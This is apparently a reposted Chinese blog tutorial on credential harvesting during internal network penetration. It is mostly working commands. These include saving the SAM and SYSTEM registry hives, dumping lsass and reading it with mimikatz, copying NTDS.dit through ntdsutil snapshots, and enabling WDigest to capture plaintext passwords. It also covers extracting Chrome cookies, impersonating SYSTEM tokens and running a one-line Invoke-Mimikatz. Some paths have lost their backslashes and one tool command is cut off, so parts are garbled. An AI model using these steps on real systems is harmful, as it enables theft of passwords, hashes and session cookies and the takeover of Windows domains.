内网渗透测艺术一凭证收集
收集本机凭据是非常重要的环节.通常我们可以收集的凭据包括但不限于:Windows hash [NTLM,LM],浏览器密码、cookie 远程桌面密码 VPN密码 WLAN密码 IIS服务器密码 FTP密码等等.
WINDOWS密码
Windows密码加密后一般两种形式
NTLM哈希和LM哈希[VISTA和2008已经取消]这些哈希有两个存储位置,本地用户在SAM数据库,
域用户存储在域控制器的NTDS.dit数据库中.当用户登陆时,这些哈希也可能存储在内存中,能够被我们抓取到
SAM 是什么?
安全账号管理器-也就是存储用户密码的数据库文件,
他在%systemroot%system32/config/SAM中,挂载在HKLM/SAM上.
为了防破解,windows核心版本NT4.0中引入了SYSTEM函数,SAM的磁盘上副本文件将被部分加密,以便存储在SAM中所有的本地账户immature哈希都使用密钥(成SYSKEY加密)
提取SAM 数据库哈希方法
导出sam数据库中的密码
UAC权限问题后续讲解
方法1:以管理员权限运行cmd,输入以下命令
reg save hklmsam c:sam.hive
reg save hklmsystem c:system.hive
方法2:使用powershell
powershell -exec bypass Import-Module .invoke-ninjacopy.ps1
Invoke-NinjaCopy -Path C:WindowsSystem32configSAM -LocalDestination .sam.hive
Invoke-NinjaCopy -Path C:WindowsSystem32configSYSTEM -LocalDestination .system.hive
将生成的sam.hive与system.hive转至本地,使用saminside或cain导入
Saminside
image.png
image.png
其他方式提取离线凭证
<离线提取进行lsass
vista及以上系统可以看到lsass进程, 右键创建转储文件.
< - lsass.dmp获取到内存转储文件后,就可以使用mimikatz提取密码.这里需要注意的是,运行mimikatz平台架构要与转储的系统兼容
Sekurlsa::minidump lsass.dmp
Sekurlsa::logonpasswords
导出域用户hash
访问域控的C:WindowsNTDS文件夹
image.pngimage.png
记录GUID并且替换之后的命令 9b9f86d4-0e2c-4c85-8468-261dc610da3b
ntdsutil snapshot “mount {GUID}” quit quit
C盘中会生成新目录,将其中的WindowsNTDSntds.dit拷贝出来
image.png
ntdsutil snapshot “unmount {GUID}” quit quit
ntdsutil snapshot " delete {GUID} " quit quit
使用提取hash
< -r -d C:ntds.dit –image.png
mimakatz获取hash与明文口令
privilege::debug
sekurlsa::logonPasswords
从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows 7/8/2008 R2/2012 需要打 kb2871997 补丁。
这里只抓取到了NTLM
image.png
破解MD5 cmd5
image.png
尝试破解2-ophcrack .php
image.png
修改注册表,启用摘要密码支持
需要创建UseLogonCredential,并赋值为1
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProviders WDigest “UseLogonCredential”(DWORD)
重新登录后,再次运行就会直接抓取明文密码
这里再扩展两个信息收集的敏感点
mimikatz提取chrome中保存的cookie
首先把chrome保存cookie的文件拷贝到桌面上方便操作,这个文件在 C:users360secappdatalocalgooglechromeuser datadefaultcookies
命令行下拷贝的命令是:
Copy 'C:users360secappdatalocalgooglechromeuser datadefaultcookies ’ c:users360secdesktop
mimikatz_trunk文件包中有个x64文件夹,进入并打开
输入
dpapi::chrome /in:c:users360secdesktopcookies /unprotect提取cookie
mimikatz的token模块中的命令列出token,模仿system用户token
选择以管理员身份运行,
privilege::debug获取debug权限
token::elevate模仿system用户的令牌
token::list列出令牌
lsadump::sam来获取sam数据库中的密码
token::revert恢复令牌
webbrowserpassview也可以获取chrome的保存的密码
日常使用Mimikatz 因为有powershell版本,☺
一句话执行
powershell Import-Module .Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command ‘“privilege::debug” “sekurlsa::logonPasswords full”’
本文发布于:2024-02-03 04:12:53,感谢您对本站的认可!
本文链接:https://www.4u4v.net/it/170690477148572.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
留言与评论(共有 0 条评论) |